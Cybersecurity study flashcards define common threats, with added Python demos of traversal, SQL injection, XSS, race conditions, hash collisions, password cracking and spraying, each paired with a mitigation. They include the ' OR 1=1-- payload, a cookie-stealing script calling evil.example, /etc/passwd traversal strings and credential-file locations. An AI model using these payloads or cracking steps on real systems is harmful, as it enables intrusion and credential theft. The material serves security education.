Threats, Vulnerabilities And Mitigation (Chapter 2) Flashcards
Advanced Persistent Threats
A sophisticated, well-funded group that uses multiple attack vectors to gain access to a network and remain undetected for as long as possible, with the end goal of stealing data or assets
Shadow IT
The use of unauthorised or unapproved IT resources within an organisation; because they bypass security review, they can unintentionally introduce vulnerabilities
Threat Vector
The path a cyber criminal uses to reach and exploit a vulnerability
Attack surface
The sum of all possible entry points (threat vectors) for unauthorised access into the network
Social engineering
The psychological manipulation of people into divulging confidential information or performing actions they should not
Phishing
Sending fake emails to a large group of people in the hope that at least one recipient opens a malicious attachment or clicks a malicious link
Spear phishing
A phishing attack targeted at a specific individual or group, using details about the target to make the message convincing
Whaling
A phishing attack that targets a high-value individual such as a CEO
Vishing
Voice phishing: a phishing attack conducted over the phone, often using pre-recorded messages or a spoofed caller ID to pressure the user into revealing information or taking an action
Tailgating
When an unauthorised individual follows an authorised person into a restricted area without that person's knowledge or consent
Piggybacking
Is when an unauthorized individual follows someone into an area with the consent of the authorised person
Email account compromise (EAC)
An attacker, using a hijacked or spoofed mailbox, sends email that appears to come from a known source and makes a seemingly legitimate request, but carries malicious links/attachments or fraudulent payment instructions
Smishing
A phishing attack delivered by SMS or other text-messaging services
Water-holing
An attack that compromises a website that users with a common interest (an industry forum, a vendor portal) are known to visit, so the victims come to the malicious content themselves
Pharming
Redirects a user to a bogus website that mimics a legitimate one, typically by poisoning DNS responses or the client's hosts file rather than by tricking the user into clicking a link
Misinformation/disinformation
The spread of false information to deceive people used for political, military or commercial goals
Typosquatting
A fake domain name that closely resembles a legitimate website's domain name (a swapped or missing letter); the fake domain sends users who mistype the address to a malicious site
Baiting
An attack that lures the victim with the promise of a reward, such as a free download or a planted USB drive, to get them to run malicious content
Shoulder surfing
An unauthorised person watches over the user's shoulder to see what they are typing or viewing
Dumpster diving
Going through someone's trash to find sensitive information (documents, notes, discarded hardware)
Password Cracking
A local or remote password attack that uses dictionary, brute-force, rainbow-table or pass-the-hash techniques to gain access to a user's account
- targets weak or misconfigured authentication (weak hashing, no salting, no lockout or rate limiting)
Remote Code Execution
Any condition in which an attacker can execute arbitrary code on a target system over a network
- generally made possible due to lack of input validation/sanitisation or bounds checking
Buffer/ heap overflow
A programming error that lets attackers write past the end of a fixed-size memory region, overwriting adjacent data such as return addresses, function pointers or heap metadata
- made possible by lack of bounds checking: input larger than the space allocated for it spills into neighbouring addresses, where it can redirect execution to attacker-supplied code
Memory Corruption
A programming error that allows attackers to access a programs memory space and hijack the normal execution flow.
- made possible by programming errors
Privilege escalation
Any condition that allows an attacker to gain elevated access on a compromised system (e.g. from a standard user to administrator, root or SYSTEM)
- made possible by programming error/misconfiguration/insufficient access control
Information disclosure
Any conditions that allows attackers to gain access to protected information
- made possible by misconfiguration/insufficient access control
Security feature bypass
A software weakness that allows attackers to circumvent policies, filters, input validation or other security safeguarding
- made possible by programming error or lack of compensating controls
Directory traversal
Any condition that allows attackers to read files outside the directory an application is meant to serve, typically by supplying "../" sequences in a user-controlled path
- made possible by insufficient validation of user-supplied paths, compounded by lax file-system permissions on the server
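Worked example (added here, not part of the original flashcards): a request path is joined onto a hypothetical document root, first with no check and then with a containment check. DOC_ROOT and the request paths are made-up values for the demo; nothing is read from disk.

```python
import posixpath

# Hypothetical document root for the demo; paths are only resolved, never read.
DOC_ROOT = "/srv/app/public"


def resolve_vulnerable(user_path):
    """Joins the request path onto the root with no check: '../' walks out of it."""
    return posixpath.normpath(posixpath.join(DOC_ROOT, user_path))


def resolve_safe(user_path):
    """Resolves the path, then refuses anything that does not stay under DOC_ROOT.

    join() discards DOC_ROOT when user_path is absolute, so a request for
    '/etc/passwd' is caught by the same containment test as '../../etc/passwd'.
    """
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, user_path))
    inside = candidate == DOC_ROOT or candidate.startswith(DOC_ROOT + "/")
    if not inside:
        raise PermissionError("path escapes document root: %r" % user_path)
    return candidate


if __name__ == "__main__":
    print(resolve_vulnerable("../../../etc/passwd"))  # escapes the root
    for p in ("images/logo.png", "docs/../index.html", "../../../etc/passwd", "/etc/passwd"):
        try:
            print(p, "->", resolve_safe(p))
        except PermissionError as err:
            print(p, "-> blocked:", err)
```

On a real server, resolve symlinks (os.path.realpath) before the containment check as well, because a symlink inside the root can point outside it.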
Denial of service
Any conditions that allows an attacker to consume system or network resources so that legitimate requests can’t be served
- made possible by insufficient network controls to block or divert malicious traffic or by unpatched/misconfigured systems
Insider threats
Unintentional or malicious activity from users, administrators or contractors with legitimate access; insiders are also a foothold sought by advanced persistent threats (APT)
- made possible by insufficient administrative, technical or physical controls
Physical attack
Booting the device from a different OS (such as on a usb drive) to access the targeted OS file system
- made possible by insufficient physical controls protecting the device
Windows unquoted service path
A form of privilege escalation that abuses the way Windows locates and starts a service executable when the service's image path contains spaces but is not enclosed in quotes.
With an unquoted path, Windows cannot tell where the program name ends and the arguments begin, so it tries each prefix that ends at a space as the program (appending .exe) before trying the full path.
- an attacker with write access to one of those directories plants an executable named after the first word of a folder name (e.g. C:\Program Files\My.exe for the service C:\Program Files\My App\svc.exe). The service, usually running as SYSTEM, then launches the planted binary instead of the real one.
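Worked example (added here, not the flashcards' own content): given a service image path, list the executables Windows would try, in order, and therefore the file names an attacker would plant. The sample path is constructed for the demo, and the function assumes the image path holds only the executable, with no trailing arguments.

```python
def unquoted_path_candidates(image_path):
    """Return the executables Windows tries, in order, for a service image path.

    For an unquoted path containing spaces, the loader cannot tell where the
    program name ends and the arguments begin, so it tries each prefix that
    ends at a space as the program (appending .exe) before the full path.
    """
    if image_path.startswith('"'):
        # A quoted path is unambiguous: only the real binary is tried.
        return [image_path.split('"')[1]]
    candidates = [image_path[:i] + ".exe" for i, ch in enumerate(image_path) if ch == " "]
    candidates.append(image_path)
    return candidates


def plant_targets(image_path):
    """The file names an attacker would create to hijack the service (all but the real one)."""
    return unquoted_path_candidates(image_path)[:-1]


if __name__ == "__main__":
    # Constructed sample: a typical unquoted image path under Program Files.
    sample = r"C:\Program Files\My App\svc.exe"
    for c in unquoted_path_candidates(sample):
        print(c)
    print("attacker plants:", plant_targets(sample))
```

To check a real host, enumerate service paths with `Get-CimInstance Win32_Service | Select-Object Name, PathName`, then test whether your account can write to the directories the candidates fall in (`icacls`). The fix is to quote the image path.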
Memory Injections
An attack in which unauthorised external code runs inside an authorised process by hijacking the memory that process is using: substituting a legitimate DLL with a malicious one (DLL injection/side-loading), injecting shellcode through a buffer overflow, or process hollowing (replacing the code of a suspended legitimate process)
Buffer
A temporary storage location in RAM allocated to an application.
Buffer Overflow
A condition in which incoming data exceeds the size of the space allocated for it in RAM (the buffer) and overwrites adjacent memory in the same process. The overflowing data can contain malicious code or addresses that redirect the program's execution
Buffer Overflow prevention
Programmers enforce an input length limit (bounds checking) in every function that accepts incoming data; memory-safe languages and compiler/OS protections (stack canaries, DEP/NX, ASLR) add defence in depth
Out of sequence Threads
Multiple CPU threads can run at the same time or be scheduled one after another by the thread scheduler. If a thread finishes earlier or later than the program assumes, another thread (possibly attacker-controlled) can run in the gap and act on state the first thread has not finished updating
Race conditions
A programming error that occurs when two or more processes/threads access and change shared data at the same time; the common form is the time-of-check to time-of-use (TOCTOU) race, where a resource changes between the moment it is checked and the moment it is used
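Worked example (added here, not from the original flashcards) of a TOCTOU race on a constructed toy account: two threads each try to withdraw the full balance. The racy version checks, waits, then writes; locking only the write does not help, because the check is already stale. The safe version holds the lock across check and use.

```python
import threading
import time


class Account:
    """Constructed toy account used to show a check-then-act race."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_racy(self, amount):
        if self.balance >= amount:       # time of check
            time.sleep(0.2)              # window: the other thread also passes the check
            with self.lock:              # locking only the write does not close the window
                self.balance -= amount   # time of use: the check no longer holds
            return True
        return False

    def withdraw_safe(self, amount):
        with self.lock:                  # check and use are one atomic step
            if self.balance >= amount:
                time.sleep(0.2)
                self.balance -= amount
                return True
            return False


def run_concurrent(method_name, start=100, amount=100, threads=2):
    """Run `threads` withdrawals in parallel; return (successful withdrawals, final balance)."""
    acct = Account(start)
    results = []

    def worker():
        results.append(getattr(acct, method_name)(amount))

    workers = [threading.Thread(target=worker) for _ in range(threads)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return sum(results), acct.balance


if __name__ == "__main__":
    print("racy:", run_concurrent("withdraw_racy"))   # two withdrawals from 100, balance -100
    print("safe:", run_concurrent("withdraw_safe"))   # one withdrawal, balance 0
```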
Web Application
Any executable that runs on a web server and dynamically builds, modifies and populates web pages
Unsanitized Input
The most common web application vulnerability, caused by not filtering or validating user input.
Without an input filter, code can be slipped into an input field and passed to an interpreter (SQL, HTML/JavaScript, OS shell), which treats it as just another instruction to execute
SQL Injections (SQLi)
The most common type of web application attack; takes advantage of insufficient input validation to send malicious SQL commands to the database server
Most common SQLi payload (closes the open string, makes the WHERE clause always true, and comments out the rest of the query):
' OR 1=1--
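Worked example (added here, not part of the original flashcards): the payload above run against a string-concatenated login query and against a parameterised one, using an in-memory SQLite database seeded with constructed users. The plaintext password column exists only to keep the demo short.

```python
import sqlite3

# Constructed sample data; passwords are plaintext here purely for brevity.
SAMPLE_USERS = [("alice", "correct horse"), ("bob", "hunter2")]
PAYLOAD = "' OR 1=1--"  # the flashcard's classic payload, used as the username


def make_db():
    """Build an in-memory SQLite database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, name, password):
    """Builds the query by concatenation: the input becomes part of the SQL."""
    query = (
        "SELECT name FROM users WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return sorted(row[0] for row in conn.execute(query).fetchall())


def login_safe(conn, name, password):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    rows = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchall()
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))  # every user
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))        # nobody
```

The concatenated query becomes `SELECT name FROM users WHERE name = '' OR 1=1--' AND password = 'anything'`: the password check is commented away and the condition is true for every row.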
Cross-site Scripting (XSS)
An attack that exploits a client's trust in a server. Malicious script is injected into a web page and executed by the victim's browser when the page loads.
Occurs when a web application does not sufficiently validate or encode user input, allowing HTML/JavaScript to be inserted into the page and run in other users' browsers
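Worked example (added here, not the flashcards' own content): a constructed attacker comment rendered into a page fragment without encoding, and then with HTML entity encoding from the standard library. The `evil.example` URL in the payload is a placeholder.

```python
import html

# Constructed attacker input; the URL is a placeholder. It is data, not markup.
ATTACK_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(comment):
    """Reflects user input straight into the page: the XSS pattern."""
    return "<div class='comment'>" + comment + "</div>"


def render_comment_safe(comment):
    """Entity-encodes the input so the browser renders it as text, not as tags."""
    return "<div class='comment'>" + html.escape(comment, quote=True) + "</div>"


def contains_active_content(fragment):
    """Demo check: does the output still contain a script tag the browser would run?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTACK_COMMENT))
    print(render_comment_safe(ATTACK_COMMENT))
```

Encoding must match the output context: html.escape is right for HTML body text and attribute values, while data placed inside a script block or a URL needs JavaScript or URL encoding instead.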
Cross-site Request Forgery (CSRF)
Exploits a server's trust in a client by taking advantage of the browser automatically sending the session cookie of an authenticated user with every request to that site.
- The browser keeps the user authenticated to a website; an attacker sends a malicious link (via phishing) or embeds a request in another page; when the user opens it, the forged request is sent with the user's cookie and the site performs an unwanted action in the background
Jailbreaking/Rooting
The process of removing restrictions imposed by the manufacturer on a mobile device to allow the user to sideload apps, modify system settings or access root privileges
Man-in-the-Middle Attack
An attack in which the attacker inserts themselves as a relay between the victim and the server the victim is trying to reach, reading or altering the traffic (also called on-path or adversary-in-the-middle). Often used to steal data.
- ARP poisoning (forged ARP replies map the gateway's or victim's IP address to the attacker's MAC address, so traffic is sent to the attacker)
- Poisoned MAC address table on a switch (MAC flooding or spoofing makes the switch forward frames to the attacker's port)
Credentials Replay Attack
An attack that eavesdrops (man-in-the-middle) on a network to intercept packets containing cookies or session tokens, then reuses the stolen token to start a new session as the victim
DNS attacks (DNS server as the victim)
DNS Flood Attack
- an attack that sends valid DNS requests at an extremely high packet rate from a large number of IP addresses (DDoS) until the server can no longer answer legitimate queries
NXDOMAIN Attack
- an attack that overwhelms the DNS server with a large volume of requests for records that do not exist, forcing lookups that all end in NXDOMAIN
DNS Amplification
- a type of DDoS attack in which the attacker sends small queries (classically for ANY records) to many open DNS resolvers with the victim's IP address as the spoofed source, so the large responses are delivered to the target.
A simple DNS request is about 60 bytes; a response containing all records from a single DNS server can be 4000+ bytes (roughly 70:1 amplification)
Reflection Attack
A type of DDoS attack in which the attacker spoofs the victim's IP address as the source of queries or pings sent to many intermediary machines (e.g. DNS servers), which all respond at the same time to the victim's machine, overwhelming it
DNS Cache Poisoning
False DNS records are inserted into a DNS server's cache, so clients that query it are redirected to malicious sites.
- DNS servers share information with each other to resolve host names, so a poisoned record can propagate to multiple servers
Evil Twin
A malicious wireless access point set up with the same SSID (and often the same BSSID/MAC address) as a legitimate access point, so that users connect to it and the attacker can eavesdrop on their sessions
Bluetooth Attack types
Bluesmacking
- denial of service against devices
Bluejacking
- sending unsolicited messages
Bluesniffing
- attempting to discover Bluetooth devices
Bluebugging
- Remotely using a devices features
Bluesnarfing
- theft of data from a devices
Blueprinting
- collecting device info over Bluetooth
HelloMoto
- attacker connects to headset of a Motorola device without authentication
Car whisperer
- connecting to Bluetooth radio of nearby car using default pins
BLUFFS
- a 2023 set of attacks on Bluetooth session-key derivation that lets an attacker impersonate paired devices and mount adversary-in-the-middle attacks
Birthday attack
A common form of collision attack based on the 'birthday paradox' (in a room of 23 people there is a 50% chance that two share a birthday): instead of matching one fixed hash, the attacker generates many inputs and looks for any two that produce the same hash, which for an n-bit hash takes about 2^(n/2) attempts rather than 2^n
MD5 is considered broken: its generic birthday bound is 2^64, but cryptanalytic attacks find MD5 collisions in seconds on commodity hardware
Hash Collision
Occurs when a hashing algorithm produces the same hash for two different inputs, which could allow an attacker to substitute one input for the other (e.g. a malicious file for a signed one) without the hash changing
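Worked example for the two cards above (added here, not part of the original flashcards): a birthday search for a collision on a deliberately truncated 24-bit hash (the first 3 bytes of SHA-256), which keeps the birthday bound of roughly 2^12 hashes small enough to hit instantly. Truncating to 24 bits is a demo choice; the messages are constructed counters.

```python
import hashlib
import math


def short_hash(data, nbytes=3):
    """Toy hash: the first `nbytes` of SHA-256 (24 bits by default).

    Used only to shrink the output space so the birthday bound is reachable;
    the same search against full SHA-256 would need about 2^128 hashes.
    """
    return hashlib.sha256(data).digest()[:nbytes]


def birthday_collision(nbytes=3, max_attempts=1_000_000):
    """Hash distinct messages until two share a digest.

    Returns (message_1, message_2, attempts) or None if the limit is reached.
    """
    seen = {}
    for i in range(max_attempts):
        msg = b"msg-%d" % i          # constructed, distinct inputs
        digest = short_hash(msg, nbytes)
        if digest in seen:
            return seen[digest], msg, i + 1
        seen[digest] = msg
    return None


def expected_attempts(nbits):
    """Birthday bound: about sqrt(pi/2 * 2^n) hashes for a 50% collision chance."""
    return math.sqrt(math.pi / 2 * 2 ** nbits)


if __name__ == "__main__":
    m1, m2, n = birthday_collision()
    print("collision after %d hashes (expected ~%.0f):" % (n, expected_attempts(24)))
    print(m1, m2, short_hash(m1).hex())
```

Compare the result with a preimage search: finding an input for one fixed 24-bit digest would take about 2^24 (16.7 million) attempts on average, versus the few thousand needed to find any pair that collides.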
Physical Password Attack
Password cracking by having physical access to the device can be done by booting up an OS via a USB and accessing the password file of the original OS, or by overwriting the area that stores the passwords.
Where are passwords stored?
Windows
- Security Account Manager (SAM) database: C:\Windows\System32\config\SAM (locked while Windows is running; readable offline unless BitLocker disk encryption protects the volume)
Active Directory
- ntds.dit under C:\Windows\NTDS\ on domain controllers
Linux
- /etc/shadow
- contains only the password hashes (readable by root only)
- /etc/passwd contains the associated usernames (world-readable)
Password Hash cracking
1) Obtain the password hashes (SAM, ntds.dit, /etc/shadow, a database dump)
2) Determine the hash algorithm (from the stored format or the digest length)
3) Hash each candidate password (password dictionary) with the same algorithm and salt
4) Compare each result with the stored hash
5) If the hashes match, you have found the password
Dictionary Attack
A password attack that uses a large list of words commonly used as passwords to guess a user's credentials.
- User name needs to be known
- potential system lock out from multiple attempts
Rainbow Table
A password attack that uses precomputed tables of hashes for common passwords (one table per algorithm) so a stolen hash can be looked up instead of recomputed; defeated by salting, which makes the precomputation per-user
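Worked example for the hash-cracking steps, the dictionary attack and the rainbow-table card above (added here, not from the original flashcards): the algorithm is inferred from the digest length, a constructed wordlist is hashed and compared, and a precomputed lookup table (a simplified stand-in for a rainbow table, which in practice uses hash chains rather than a flat dictionary) is shown to fail against a salted hash. The "stolen" hashes, wordlist and salt are constructed for the demo.

```python
import hashlib

# Constructed wordlist for the demo.
WORDLIST = ["123456", "password", "letmein", "hunter2", "qwerty", "Summer2024!"]

# Unsalted hex digests can be told apart by length alone (assumed formats).
HASH_BY_HEX_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

# Constructed "stolen" hashes: one plain, one salted with a made-up salt.
STOLEN_SHA256 = hashlib.sha256(b"hunter2").hexdigest()
DEMO_SALT = "x7Qp"
STOLEN_SALTED = hashlib.sha256((DEMO_SALT + "hunter2").encode()).hexdigest()


def guess_algorithm(hex_digest):
    """Step 2: infer the algorithm from the digest length."""
    return HASH_BY_HEX_LENGTH.get(len(hex_digest))


def crack(hex_digest, wordlist=WORDLIST, salt=""):
    """Steps 3-5: hash every candidate (with the salt, if known) and compare."""
    algo = guess_algorithm(hex_digest)
    if algo is None:
        return None
    for word in wordlist:
        if hashlib.new(algo, (salt + word).encode()).hexdigest() == hex_digest:
            return word
    return None


def build_lookup_table(wordlist=WORDLIST, algo="sha256"):
    """Precomputed hash -> plaintext table for one algorithm (rainbow-table idea)."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in wordlist}


if __name__ == "__main__":
    table = build_lookup_table()
    print("dictionary:", crack(STOLEN_SHA256))            # hunter2
    print("lookup:    ", table.get(STOLEN_SHA256))         # hunter2
    print("salted, no salt known:", crack(STOLEN_SALTED))  # None
    print("salted, salt known:   ", crack(STOLEN_SALTED, salt=DEMO_SALT))
```

The demo cracks in microseconds because SHA-256 is fast and unsalted; stores that use a slow, salted password hash (bcrypt, scrypt, Argon2) make each guess expensive and the precomputed table useless.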
Password Spraying
A variant of brute forcing that uses the same password for multiple different user names.
- used to circumvent account lockout
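Worked example (added here, not the flashcards' own content) of why spraying evades lockout: a toy authentication service with an assumed lockout threshold of five failures per account, a constructed user directory, and both attack patterns run against it.

```python
from collections import defaultdict

LOCKOUT_THRESHOLD = 5  # assumed policy: failures per account before lockout

# Constructed directory of usernames and their (weak, reused) passwords.
USERS = {
    "alice": "Winter2024!",
    "bob": "Summer2024!",
    "carol": "Autumn2024!",
    "dave": "Summer2024!",
}


class AuthService:
    """Toy login endpoint that counts failures per account and locks it out."""

    def __init__(self, users, threshold=LOCKOUT_THRESHOLD):
        self.users = users
        self.threshold = threshold
        self.failures = defaultdict(int)
        self.locked = set()

    def login(self, user, password):
        if user in self.locked:
            return "locked"
        if self.users.get(user) == password:
            self.failures[user] = 0
            return "ok"
        self.failures[user] += 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)
        return "fail"


def brute_force(service, user, guesses):
    """One account, many passwords: every miss counts against the same account."""
    for guess in guesses:
        if service.login(user, guess) == "ok":
            return guess
    return None


def password_spray(service, users, passwords):
    """Many accounts, few passwords: each account sees at most len(passwords) failures."""
    hits = {}
    for pw in passwords:
        for user in users:
            if service.login(user, pw) == "ok":
                hits[user] = pw
    return hits


if __name__ == "__main__":
    svc = AuthService(USERS)
    print(brute_force(svc, "alice", ["a", "b", "c", "d", "e", "Winter2024!"]), svc.locked)
    svc = AuthService(USERS)
    print(password_spray(svc, list(USERS), ["Summer2024!", "Spring2024!"]), svc.locked)
```

Detection of spraying therefore has to look across accounts (many users, one failure each, from one source in a short window) rather than at per-account failure counts.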
Credentials Stuffing
A variant of brute forcing that uses username/password pairs leaked from one breach to attempt login on other sites, relying on password reuse
Pass-the-hash
A network-based attack that uses a user's stolen password hash (typically NTLM, dumped from the memory or SAM of a compromised host) to authenticate directly, without cracking it.
Once the hash and the username are obtained, both are passed to a tool that performs the authentication with the hash in place of the password